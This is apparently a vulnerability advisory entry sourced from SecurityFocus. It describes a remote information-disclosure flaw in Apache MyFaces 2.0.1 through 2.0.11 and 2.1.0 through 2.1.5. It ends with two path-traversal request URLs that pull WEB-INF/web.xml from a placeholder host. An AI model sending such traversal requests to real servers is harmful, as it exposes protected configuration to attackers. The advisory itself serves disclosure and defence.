13 lines
No EOL
489 B
Text
13 lines
No EOL
489 B
Text
source: https://www.securityfocus.com/bid/51939/info
|
|
|
|
Apache MyFaces is prone to a remote information-disclosure vulnerability.
|
|
|
|
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
|
|
|
|
The following versions are affected:
|
|
|
|
Apache MyFaces 2.0.1 through 2.0.11
|
|
Apache MyFaces 2.1.0 through 2.1.5
|
|
|
|
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
|
|
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF |